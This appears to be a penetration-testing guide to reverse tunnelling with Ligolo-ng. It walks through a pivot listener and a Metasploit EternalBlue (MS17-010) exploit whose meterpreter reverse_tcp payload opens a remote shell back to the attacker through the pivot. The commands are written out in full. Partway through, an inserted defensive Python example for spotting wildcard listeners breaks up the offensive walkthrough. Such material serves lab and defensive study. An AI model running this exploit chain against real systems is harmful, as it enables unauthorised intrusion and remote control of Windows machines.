Ligolo Reverse tunnel
Since you are using Ligolo-ng, the setup is significantly cleaner than SSH tunneling because Ligolo-ng operates at the TUN interface (Layer 3) level. This means you don't have to "trick" Metasploit with 127.0.0.1. You can talk to the Windows IP directly.
However, for the Reverse Shell, you still need to tell the Windows target to send its connection to the Ligolo-ng agent (the Pivot), which will then relay it back to your AttackBox.
The Strategy
- Direct Routing: Use your Ligolo TUN interface to hit the Windows RHOST directly.
- Ligolo Listener: Set up a listener inside the Ligolo-ng proxy to catch the reverse shell on the Pivot and redirect it to your AttackBox.
Step 1: Set up the Ligolo Listener
On your AttackBox (inside the ligolo-proxy terminal), you need to create a listener that lives on the Agent (Pivot).
- --addr 0.0.0.0:8080: Tells the Linux Pivot (Agent) to listen on port 8080 for the Windows shell.
- --to 127.0.0.1:4444: Redirects that traffic to port 4444 on your AttackBox.
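Seen from the pivot host's side, the listener described above is a wildcard-bound TCP socket owned by the agent process. The following is an added example, not part of the original page: it parses `ss -H -ltnp` output and flags wildcard listeners that no allowlisted service owns. The sample lines, the process name `agent`, and the allowlist are constructed assumptions.

```python
import re

# Constructed sample of `ss -H -ltnp` output from a Linux host (not real data).
SAMPLE_SS = """\
LISTEN 0 128   0.0.0.0:22     0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 4096  0.0.0.0:8080   0.0.0.0:* users:(("agent",pid=4312,fd=7))
LISTEN 0 511   127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=990,fd=5))
LISTEN 0 128   [::]:22        [::]:*    users:(("sshd",pid=812,fd=4))
LISTEN 0 4096  *:9100         *:*       users:(("node_exporter",pid=700,fd=3))
LISTEN 0 4096  0.0.0.0:3000   0.0.0.0:*
"""

WILDCARDS = {"0.0.0.0", "[::]", "*"}
# Hypothetical allowlist: (process name, port) pairs expected on this host.
ALLOWED = {("sshd", 22), ("node_exporter", 9100)}
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')

def parse_listener(line):
    """Return (addr, port, proc, pid) for one LISTEN line, or None."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "LISTEN":
        return None
    addr, _, port = fields[3].rpartition(":")
    if not port.isdigit():
        return None
    m = PROC_RE.search(line)
    # Without root, ss omits users:(...) - keep the socket, owner unknown.
    proc, pid = (m.group(1), int(m.group(2))) if m else (None, None)
    return addr, int(port), proc, pid

def unexpected_wildcard_listeners(ss_output, allowed=ALLOWED):
    """Flag sockets reachable from other hosts that no allowlisted service owns."""
    findings = []
    for line in ss_output.splitlines():
        parsed = parse_listener(line)
        if parsed is None:
            continue
        addr, port, proc, pid = parsed
        if addr in WILDCARDS and (proc, port) not in allowed:
            findings.append({"addr": addr, "port": port, "proc": proc, "pid": pid})
    return findings

if __name__ == "__main__":
    for f in unexpected_wildcard_listeners(SAMPLE_SS):
        print(f)
```

Sockets with no visible owner are reported with `proc` set to `None`, so they still surface when `ss` is run without root.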
Step 2: Configure Metasploit
Because Ligolo-ng provides a real network route to the internal subnet, you can use the actual Windows IP for RHOSTS.
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 1. Target the Windows machine directly (thanks to Ligolo routing)
set RHOSTS [INTERNAL_WINDOWS_IP]
# 2. Tell the payload to call back to the Linux Pivot's IP
set LHOST [LINUX_PIVOT_INTERNAL_IP]
set LPORT 8080
# 3. Tell Metasploit where the shell will actually land on your box
set ReverseListenerBindAddress 127.0.0.1
set ReverseListenerBindPort 4444
exploit
Why this is better than SSH
- No Port Conflicts: You don't have to worry about your local port 445 being in use because you aren't forwarding to localhost. You are routing through the ligolo TUN adapter.
- Scanning: You can run nmap or other tools against the real Windows IP address as if it were on your own network.
Troubleshooting Checklist
- TUN Interface: Ensure you have added the route to your AttackBox's routing table (e.g., sudo ip route add 192.168.1.0/24 dev ligolo).
- Agent Permissions: The Ligolo-ng agent on the Linux Pivot usually needs to run with high privileges (sudo/root) to bind to ports and handle the listener properly.
- Windows Firewall: If the exploit launches but the shell never comes back, ensure the Windows machine can "see" the Linux Pivot on port 8080.